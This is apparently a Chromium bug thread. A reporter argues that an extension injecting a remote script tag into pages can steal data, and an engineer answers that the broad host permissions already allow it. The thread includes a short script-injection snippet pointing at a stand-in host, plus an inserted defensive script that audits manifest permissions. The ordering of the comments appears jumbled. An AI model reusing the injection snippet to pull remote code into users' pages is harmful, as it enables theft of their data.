Security: Cross domain security from js injection on chrome extension
Reported by os.jerom...@gmail.com, May 13 2018
Issue description
Hello, it is the first time I report an issue; sorry in advance if I did not do it as expected. I tried to follow the guidelines.
VULNERABILITY DETAILS
From a Chrome extension, we can inject some JavaScript into the current user's page that is able to send confidential data to external, cross-domain servers.
The problem comes from the ability to create on the DOM a script element with an src attribute pointing to any URL.
I mean something like this:
// Create a script element whose src points at an arbitrary external origin
var script = document.createElement('script');
script.src = "http://localhost:1337/";
// Appending it to the page's DOM loads and runs that remote script in the page context
document.head.appendChild(script);
All the details are in the attachment.
VERSION
Version 66.0.3359.139 (Official Build) (64-bit)
Operating System: [Windows 10 PRO x64]
REPRODUCTION CASE
Everything is in the attachment.
May 13 2018
Hello elawrence, are you sure about what you say, and did you see the attachment with the 3-request mechanism in the example? From my point of view it seems very strange that a "color picker" extension, for example, could take a lot of confidential information when you connect to some websites, without any warning, even on HTTPS with cross-domain requests.
May 13 2018
In the extension folder, open manifest.json. What permissions are requested?
May 13 2018
"permissions": ["tabs","http://*/*","https://*/*","activeTab", "declarativeContent", "storage", "contextMenus"]
Well, if everything is allowed, it is OK for me. I just give you my feedback: it seems very, very insecure to use add-ons :) Thank you for your answers.
May 14 2018
When installing such an extension, the user is warned that the extension requests permission to "Read and change all your data on the websites you visit". If they grant permission, the extension may indeed do as the prompt warns.
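The permission list quoted in the report, checked the way elawrence suggests (open manifest.json and look at what is requested), as an added example that is not part of the original report or of Chromium's code. It is a small Node.js audit script: it reads a parsed manifest, separates API permissions from host match patterns, and reports which patterns are broad enough to cover every site the user visits, which is what produces the "Read and change all your data on the websites you visit" prompt. The manifest objects are constructed here (the first from the report's permission list, the second a narrower counterpart); the function names and the Manifest V3 `host_permissions` handling are my assumptions about how one would write such a check, not a Chromium API.

```javascript
// Added example, not code from the bug report or from Chromium. Audits a parsed
// manifest.json for host match patterns that cover every website, which is what
// produces the install prompt "Read and change all your data on the websites
// you visit". Pattern syntax (scheme://host/path, "<all_urls>") follows Chrome's
// documented match-pattern format; the function names are assumptions.

// Host patterns and API permissions share one "permissions" array in Manifest V2;
// Manifest V3 moves host patterns into "host_permissions". Both arrays are read.
function collectDeclaredPermissions(manifest) {
  return [
    ...(Array.isArray(manifest.permissions) ? manifest.permissions : []),
    ...(Array.isArray(manifest.host_permissions) ? manifest.host_permissions : []),
  ];
}

// A string is a host match pattern if it is "<all_urls>" or has the form scheme://host/path.
function isHostPattern(p) {
  return p === '<all_urls>' || /^(\*|https?|file|ftp):\/\/[^/]*\//.test(p);
}

// A host pattern is "broad" when it matches every host on http and/or https:
// "<all_urls>", "*://*/*", "http://*/*" or "https://*/*". Patterns with a real
// host ("https://*.example.com/*") or a file:/ftp: scheme are not broad.
function isBroadHostPattern(p) {
  if (p === '<all_urls>') return true;
  const m = /^(\*|https?|file|ftp):\/\/([^/]*)\//.exec(p);
  if (!m) return false;
  const [, scheme, host] = m;
  return host === '*' && (scheme === '*' || scheme === 'http' || scheme === 'https');
}

// Returns the audit result: declared API permissions and host patterns, which
// patterns are broad, whether the manifest therefore reaches every site, and
// plain-text notes a reviewer would raise.
function auditManifest(manifest) {
  const declared = collectDeclaredPermissions(manifest);
  const hostPatterns = declared.filter(isHostPattern);
  const apiPermissions = declared.filter((p) => !isHostPattern(p));
  const broadHostPatterns = hostPatterns.filter(isBroadHostPattern);
  const readsAllSites = broadHostPatterns.length > 0;
  const notes = [];
  if (readsAllSites) {
    notes.push('Broad host access: the extension can run script in, read from and send data out of any page it matches.');
    if (apiPermissions.includes('activeTab')) {
      notes.push('activeTab is already declared; if page access is only needed after a user gesture, the broad host patterns may be unnecessary.');
    }
  }
  return { apiPermissions, hostPatterns, broadHostPatterns, readsAllSites, notes };
}

// Constructed sample: the permission list quoted in the report, placed in a
// minimal Manifest V2 object (name and version are placeholders).
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: 'example-extension',
  version: '0.0.1',
  permissions: ['tabs', 'http://*/*', 'https://*/*', 'activeTab', 'declarativeContent', 'storage', 'contextMenus'],
};

// Constructed least-privilege counterpart: the same extension limited to one site plus activeTab.
const NARROW_MANIFEST = {
  manifest_version: 3,
  name: 'example-extension',
  version: '0.0.1',
  permissions: ['activeTab', 'storage', 'contextMenus'],
  host_permissions: ['https://example.com/*'],
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST), null, 2));
  console.log(JSON.stringify(auditManifest(NARROW_MANIFEST), null, 2));
}
```

Run it with `node audit.js` after pasting a real manifest into `SAMPLE_MANIFEST`; `readsAllSites: true` on the report's list shows the prompt was accurate, and the narrow manifest shows what the same extension declares when it only needs one site and the active tab.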
May 15 2018
Hello elawrence, yes of course I saw it, but I asked the question to different people today, and for them it was absolutely not obvious that this sentence, "Read and change all your data on the websites you visit", also means "the extension creator can also steal this data". If you can forward this information, maybe the warning message will be changed, and then it could save a lot of people :) Once again, thank you for the time you have spent on this report.
May 15 2018
What warning text do you imagine would be more clear?
May 15 2018
Hello elawrence, I am not a native English speaker so I don't know if my advice will be the best, but I would like to suggest something like: "Read and change all your data on the websites you visit and make external use". What do you think? It seems more appropriate to me. Best regards
Aug 20
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by elawrence@chromium.org, May 13 2018